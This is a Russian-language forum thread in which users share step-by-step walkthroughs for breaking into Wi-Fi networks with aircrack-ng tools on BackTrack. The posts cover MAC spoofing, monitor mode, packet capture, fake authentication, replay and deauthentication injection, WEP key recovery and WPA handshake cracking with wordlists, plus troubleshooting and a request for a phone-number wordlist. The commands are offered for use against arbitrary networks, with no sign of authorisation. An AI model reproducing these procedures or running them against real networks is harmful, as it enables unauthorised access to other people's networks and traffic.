Sending Authentication Request (Open System) Sending Authentication Request (Open System) Sending Authentication Request (Open System) Attack was unsuccessful. Possible reasons: * Perhaps MAC address filtering is enabled. * Check that the BSSID (-a option) is correct. * Try to change the number of packets (-o option). * The driver/card doesn't support injection. * This attack sometimes fails against some APs. * The card is not on the same channel as the AP. * You're too far from the AP. Get closer, or lower как эту штуку побороть ? на 5ом шаге такая фигня постоянно, уже на двух разных точках ...
Intel Atom проц вроде, по разному делал. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0 aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0
KEY FOUND! Нашёл ключ: KEY FOUND! [ EF:CD:59:73:70:20:B7:C3:8C:17:0E:6E:24 ] Я так понимаю это в hex? А как их в ascii преобразовать если не все символы ключа содержатся в стандартных ascii таблицах?
Не факт, что в HEX, это может и быть ключ. А вообще, если с английсим дружишь - почитай http://aircrack-ng.org/doku.php?id=aircrack-ng How to convert the HEX WEP key to ASCII? Если не дружишь - то так: http://translate.google.com/translate?u=http://aircrack-ng.org/doku.php?id=aircrack-ng&hl=ru&langpair=auto|ru&tbb=1 Ведь когда ты вводишь ключ, там же есть вариант ввода в 16-тиричном виде, вот и вводи как есть Вот еще: http://centricle.com/tools/ascii-hex/ - внизу только поставь кнопу на HEX to ASCII и удивишься, что ключ остался прежним, т.е. так и вводи его
что за ошибка root@root:~# airmon-ng Interface Chipset Driver wlan0 Unknown rndis_wlan - [phy1] root@root:~# airmon-ng start wlan0 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 2437 dhclient3 10964 dhclient3 Process with PID 10964 (dhclient3) is running on interface wlan0 Interface Chipset Driver wlan0 Unknown rndis_wlan - [phy1]mon0: ERROR while getting interface flags: No such device (monitor mode enabled on mon0) Что делать с этой ошибкой "ERROR while getting interface flags: No such device"? Заранее огромное спасибо!
asus WL-169 поддерживается только версия v2, если у тебя адаптер 3 версии, то с аиркраком тебе не поработать.
Приветствую всех. По работе часто бываю за границей бывшего СССР, и хочу сказать, что всегда можно встретить одну или две точки с шифрованием WEP, думаю взлом WEPa остается актуальным и сегодня. Хочу поделиться еще одним способом взлома WEP без подключенных клиентов. Взлом этим способом провел за 5 мин, вот параметры моего железа: ноутбук Acer Aspire 8930G, Intel Core 2Duo, Nvidia Geforse 9600M, Wifi Intel 5100 802.11 a/b/g - карта поддерживает инжекцию. Для взлома ваша карта WiFi должна поддерживать инжекцию, без этого Data пакеты будут собираться очень медленно, ну примерно 600 пакетов в сутки. Взлом делал в BT 5R1 Gnome 64 airmon-ng airmon-ng stop wlan0 (ifconfig down - не запускал) macchanger --mac 00:11:22:33:44:66 wlan0 После ввода этой команды выдало, что мой девайс занят каким-то приложением и смена мака невозможна, оказалось что карта была задействована в менеджере сетей Wicd, в настройках прописал wlan1 и продолжил: airmon-ng start wlan0 [enable monitor device on mon0] После ввода этой команды, выдало что моя карта занята каким-то процессом PID, убиваем эти процессы если их один или несколько: kill -9 [номер процесса PID] Далее стандартно: airodump-ng mon0 Мы видим доступные сети, в частности MAC адрес (BSSID), канал (CH) и имя (ESSID). После выбора подходящей сети Ctrl+C, открываем новый терминал. Теперь мы начнем собирать данные с WIFI роутера для атаки: airodump-ng -c [channel] -w [network.out] –bssid [bssid] mon0 (после флага -w имя файла может быть любым, как вам удобно) Команда выше поместит полученные данные в файл network.out. Этот файл потребутеся нам позднее когда мы будем готовы взламывать WEP ключ. Файл находится в директории /root/. Открываем другое окно терминала и предыдущую команду оставляем выполняться. Теперь же мы сгенерируем несколько поддельных пакетов к роутеру для ускорения сбора данных. Используем следующую команду: aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] mon0 После этой команды должны обязательно получить Association successful : - ) если этой надписи нет, значит вы либо далеко от точки, либо ваша карта не поддерживает инжекцию. Далее airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 mon0 Это заставит точку доступа послать большое количество пакетов, которые мы сможем использовать для взлома WEP ключа. Далее в том же окне: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 mon0 (FF:FF:FF:FF:FF:FF - так и вводить все буквы F) Окно будет задавать вопросы о сохранении пакетов жмем Y, пока не соберем достаточно Data 10000-20000 После этой команды пакеты Data должны собираться с огромной скоростью (за 3 мин. я собрал 18000 пакетов) Когда мы наберем достаточно пакетов, начинаем взлом. Открываем новое окно и вводим: aircrack-ng -b [bssid] [network.out]-01.cap (После ввода aircrack-ng -b [bssid] просто перетащите фаил -01.cap из папки /root/ в окно терминала) После этого будет найден ключ, свой я нашел за 30 сек (а может и меньше). Вводим его без точек. В BT 5 R1 в менеджере сетей, при вводе ключа не забыть изменить шифрование на WEP hash. Быстрых взломов вам !
Вышел Backtrack 5 (R2) .В новой версии (01.03.2012) устранено множество ошибок и добавлено более 40 новых утилит. Linux-ядро обновлено до версии 3.2.6 и включает дополнительные патчи, связанные с возможностью подстановки wifi-трафика и обеспечения максимальной поддержки проведения тестирования безопасности беспроводных сетей. Все оригинальные наработки, созданные в рамках дистрибутива, распространяются под лицензией GPL. Из добавленных улучшений можно отметить: Metasploit 4.2.0 — удобная платформа для создания и отладки эксплоитов SET 3.0 — набор для социальной инженерии reaver — взлом WPA сетей через уязвимость в WPS /pentest/sniffers/easy-creds/easy-creds.sh — разные варианты атаки типа MITM /pentest/passwords/hash-identifier/hash_id.py — поиск типа хеша /pentest/passwords/findmyhash/findmyhash.py — поиск хешей по открытым базам /pentest/web/scanners/joomscan/joomscan.pl — сканер CMS joomla
Уже установил как ОС, должен отметить, впечатлила на ура ^^ Кстати вот мой метод взлома, wep, wpa сеток Aircrack основные команды управления * создаём новую папку на рабочем столе под любым названием, главное после помнить название самой папки * открываем терминал и вводим * iwconfig делее ENTER * далее вводим airmon-ng start wlan0 [wlan0 - имя вашего wifi адаптера, если устройство интегрированно, то оно может называться wlan1] * airodump-ng mon0 делее ENTER * после того как программа определит сети жмём CTRL-C для остановки сканирования * сохраним параметры BSSID [первая строчка], для сохранения можно использовать текстовый документ * сохраним параметры CH [шестая строчка], это наш канал * обращаем внимание на тип защиты WEP - WPA - WPA2 * сохраним параметры ESSD [последния строчка], имя нашей сети * airodump-ng -c "n° CH (канал)" -w "название папки"/"название файла" --bssid "n°bssid" mon0 ENTER * Открываем другой терминал и вводим * aireplay-ng -0 5 -a "n° bssid " -c "n° под надписью station" mon0 ENTER * последние действие нам нужно для создания траффика в сети каторую мы взламываем CRACK WPA / WPA2 * открываем терминал и вводим следующее * aircrack-ng "название папки"/"название файла"-01.cap ЖДЁМ КОГДА ВЫСВЕТИТСЯ "1 WPA HANDSHACKE" * aircrack-ng "название папки"/"название файла"-01.cap -w "название папки"/wordlist.dic ENTER ЖДЁМ КОГДА ПОЯВИТСЯ "WPA KEY FOUND" CRACK WEP * открываем терминал и вводим следующее * aircrack-ng "название папки"/"название файла"-01.cap -b "bssid" ЖДЁМ КОГДА ПОЯВИТСЯ "WEP KEY FOUND"
и как всегда много движений wifiway рулит и на высоте по вепу ! да и по поимке впа тоже!!! feedingbootle утилита которая там есть в етой сборке делает все визуально , я писал уже много раз .
В Backtrack 5 есть Gerix , который тоже отлично ломает WEP и собирает хендшейки WPA/ WPA2 , плюс Wireshark для проверки воздуха.Reaver тоже уже добавили,Inflator можно поставить в одну команду.И замечательная команда Besside-ng , которая ломает все что видит(и что сможет) Да и английский как-то ближе чем испанский.
подскажите как сгенерить вордлист числовой диапазона 89000000000 и до 89999999999,т.е номера мобильников с помощью backtrack?
эт ясно,тока вот мне б хотелось узнать с какими параметрами ее запустить?ну или хотя б ссылочку на более-менее внятный ман по кранчу